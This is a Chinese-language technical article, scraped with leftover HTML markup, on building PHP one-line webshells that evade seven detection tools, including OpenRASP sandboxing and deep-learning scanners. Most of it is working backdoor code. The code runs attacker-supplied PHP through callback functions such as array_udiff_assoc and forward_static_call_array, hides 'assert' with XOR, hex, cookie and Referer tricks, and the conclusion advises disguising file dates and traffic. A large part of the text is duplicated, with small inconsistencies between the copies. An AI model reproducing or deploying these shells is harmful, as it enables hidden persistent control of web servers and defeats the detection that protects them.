PHP一句话木马检测绕过技术研究<\/h1>

0x00 前言<\/h2>
Webshell是指能够执行系统命令、加载代码的函数，或组合普通函数完成高级间谍功能的网站后门脚本。本文专注于PHP语言的Webshell检测工具和平台的绕过方法，目标是构造能够绕过7个主流专业工具和平台检测的PHP Webshell。<\/p>

0x01 Webshell后门分类<\/h2>

单\/少功能木马<\/strong>：完成写入文件、列目录、查看文件、执行系统命令等少量功能<\/li>
逻辑木马<\/strong>：利用系统逻辑漏洞或构造特殊触发条件绕过访问控制<\/li>
一句话木马<\/strong>：在服务器上执行PHP代码并与客户端(如菜刀、Cknife)交互<\/li>

多功能木马<\/strong>：编写较多代码完成大量间谍功能的Webshell(大马)<\/li> <\/ol>
一句话木马原理<\/h3>

客户端将PHP代码使用特殊参数名(密码)发送给服务端木马文件<\/li>
木马脚本在服务器上执行发来的PHP代码<\/li>
将执行结果回传给客户端展示<\/li> <\/ol>
0x02 查杀现状研究<\/h2>
代码执行函数("函数机")<\/h3>

函数<\/th> 说明<\/th> <\/tr> <\/thead>

eval<\/td> PHP 4,5,7+可用，将字符串作为PHP代码执行<\/td> <\/tr>
assert<\/td> PHP 4,5,7.2以下可用，可接受参数执行代码<\/td> <\/tr>
正则匹配类<\/td> preg_replace\/mb_ereg_replace\/preg_filter等<\/td> <\/tr>
文件包含类<\/td> include\/include_once\/require\/require_once\/file_get_contents等<\/td> <\/tr> <\/tbody> <\/table>
传统字符串拆分、变形、进制转换等躲避方法效果已大大降低。<\/p>
0x03 查找可做后门的回调函数<\/h2>
查找关键词：<\/p>

callable<\/li>
mixed $options<\/li>
handler<\/li>
callback<\/li>
invoke<\/li> <\/ol>
0x04 绕过传统检测方法<\/h2>
示例1：使用array_udiff_assoc函数<\/h3>
<?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>array_udiff_assoc<\/span>(array<\/span>($_REQUEST[$password]), array<\/span>(1<\/span>), "assert"<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>示例2：使用array_intersect_ukey函数<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$ch =<\/span> explode<\/span>("."<\/span>, "hello.ass.world.er.t"<\/span>); <\/span><\/span>array_intersect_ukey<\/span>(array<\/span>($_REQUEST[$password] =><\/span> 1<\/span>), array<\/span>(1<\/span>), $ch[1<\/span>].<\/span>$ch[3<\/span>].<\/span>$ch[4<\/span>]); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x05 突破OpenRASP WebShell沙盒检测<\/h2> 方法1：利用重命名前后的脚本名不同<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$<\/span>{"LandGrey"<\/span>} =<\/span> substr<\/span>(__FILE__<\/span>, -<\/span>5<\/span>, -<\/span>4<\/span>).<\/span>"class"<\/span>; <\/span><\/span>$f =<\/span> $LandGrey ^<\/span> hex2bin<\/span>("12101f040107"<\/span>); <\/span><\/span>array_intersect_uassoc<\/span>(array<\/span>($_REQUEST[$password] =><\/span> ""<\/span>), array<\/span>(1<\/span>), $f); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>方法2：利用检测平台的信息缺失<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$key =<\/span> substr<\/span>(__FILE__<\/span>, -<\/span>5<\/span>, -<\/span>4<\/span>); <\/span><\/span>$<\/span>{"LandGrey"<\/span>} =<\/span> $_SERVER["HTTP_ACCEPT"<\/span>].<\/span>"Land!"<\/span>; <\/span><\/span>$f =<\/span> pack<\/span>("H*"<\/span>, "13"<\/span>.<\/span>"3f120b1655"<\/span>) ^<\/span> $LandGrey; <\/span><\/span>array_intersect_uassoc<\/span>(array<\/span>($_REQUEST[$password] =><\/span> ""<\/span>), array<\/span>(1<\/span>), $f); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x06 绕过深度学习技术的检测<\/h2> 示例1：利用Cookie值<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$ch =<\/span> $_COOKIE["set-domain-name"<\/span>]; <\/span><\/span>array_intersect_ukey<\/span>(array<\/span>($_REQUEST[$password] =><\/span> 1<\/span>), array<\/span>(1<\/span>), $ch.<\/span>"ert"<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>彩蛋：绕过几乎所有检测的方法<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$wx =<\/span> substr<\/span>($_SERVER["HTTP_REFERER"<\/span>], -<\/span>7<\/span>, -<\/span>4<\/span>); <\/span><\/span>forward_static_call_array<\/span>($wx.<\/span>"ert"<\/span>, array<\/span>($_REQUEST[$password])); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>请求时设置Referer头以"ass****"结尾，如：Referer: http:\/\/www.target.com\/ass.php<\/code><\/p> 0x07 总结<\/h2> 传统检测技术对基于陌生回调函数构造的后门已失去效果<\/li> 新型沙盒技术和深度学习检测平台还不够成熟稳定<\/li> 脚本本身免杀只是第一步，实际应用中还需考虑创建日期、文件大小、通信特征等因素<\/li> <\/ol> 0x08 参考文档<\/h2> PHP回调后门<\/a><\/li> PHP字符串与十六进制转换<\/a><\/li> <\/ol>

函数<\/th>	说明<\/th> <\/tr> <\/thead>
eval<\/td>	PHP 4,5,7+可用，将字符串作为PHP代码执行<\/td> <\/tr>
assert<\/td>	PHP 4,5,7.2以下可用，可接受参数执行代码<\/td> <\/tr>
正则匹配类<\/td>	preg_replace\/mb_ereg_replace\/preg_filter等<\/td> <\/tr>
文件包含类<\/td>	include\/include_once\/require\/require_once\/file_get_contents等<\/td> <\/tr> <\/tbody> <\/table> 传统字符串拆分、变形、进制转换等躲避方法效果已大大降低。<\/p> 0x03 查找可做后门的回调函数<\/h2> 查找关键词：<\/p> callable<\/li> mixed $options<\/li> handler<\/li> callback<\/li> invoke<\/li> <\/ol> 0x04 绕过传统检测方法<\/h2> 示例1：使用array_udiff_assoc函数<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>array_udiff_assoc<\/span>(array<\/span>($_REQUEST[$password]), array<\/span>(1<\/span>), "assert"<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>示例2：使用array_intersect_ukey函数<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$ch =<\/span> explode<\/span>("."<\/span>, "hello.ass.world.er.t"<\/span>); <\/span><\/span>array_intersect_ukey<\/span>(array<\/span>($_REQUEST[$password] =><\/span> 1<\/span>), array<\/span>(1<\/span>), $ch[1<\/span>].<\/span>$ch[3<\/span>].<\/span>$ch[4<\/span>]); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x05 突破OpenRASP WebShell沙盒检测<\/h2> 方法1：利用重命名前后的脚本名不同<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$<\/span>{"LandGrey"<\/span>} =<\/span> substr<\/span>(__FILE__<\/span>, -<\/span>5<\/span>, -<\/span>4<\/span>).<\/span>"class"<\/span>; <\/span><\/span>$f =<\/span> $LandGrey ^<\/span> hex2bin<\/span>("12101f040107"<\/span>); <\/span><\/span>array_intersect_uassoc<\/span>(array<\/span>($_REQUEST[$password] =><\/span> ""<\/span>), array<\/span>(1<\/span>), $f); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>方法2：利用检测平台的信息缺失<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$key =<\/span> substr<\/span>(__FILE__<\/span>, -<\/span>5<\/span>, -<\/span>4<\/span>); <\/span><\/span>$<\/span>{"LandGrey"<\/span>} =<\/span> $_SERVER["HTTP_ACCEPT"<\/span>].<\/span>"Land!"<\/span>; <\/span><\/span>$f =<\/span> pack<\/span>("H"<\/span>, "13"<\/span>.<\/span>"3f120b1655"<\/span>) ^<\/span> $LandGrey; <\/span><\/span>array_intersect_uassoc<\/span>(array<\/span>($_REQUEST[$password] =><\/span> ""<\/span>), array<\/span>(1<\/span>), $f); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x06 绕过深度学习技术的检测<\/h2> 示例1：利用Cookie值<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$ch =<\/span> $_COOKIE["set-domain-name"<\/span>]; <\/span><\/span>array_intersect_ukey<\/span>(array<\/span>($_REQUEST[$password] =><\/span> 1<\/span>), array<\/span>(1<\/span>), $ch.<\/span>"ert"<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>彩蛋：绕过几乎所有检测的方法<\/h3> <?<\/span>php<\/span> <\/span><\/span>$password =<\/span> "LandGrey"<\/span>; <\/span><\/span>$wx =<\/span> substr<\/span>($_SERVER["HTTP_REFERER"<\/span>], -<\/span>7<\/span>, -<\/span>4<\/span>); <\/span><\/span>forward_static_call_array<\/span>($wx.<\/span>"ert"<\/span>, array<\/span>($_REQUEST[$password])); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>请求时设置Referer头以"ass***"结尾，如：Referer: http:\/\/www.target.com\/ass.php<\/code><\/p> 0x07 总结<\/h2> 传统检测技术对基于陌生回调函数构造的后门已失去效果<\/li> 新型沙盒技术和深度学习检测平台还不够成熟稳定<\/li> 脚本本身免杀只是第一步，实际应用中还需考虑创建日期、文件大小、通信特征等因素<\/li> <\/ol> 0x08 参考文档<\/h2> PHP回调后门<\/a><\/li> PHP字符串与十六进制转换<\/a><\/li> <\/ol>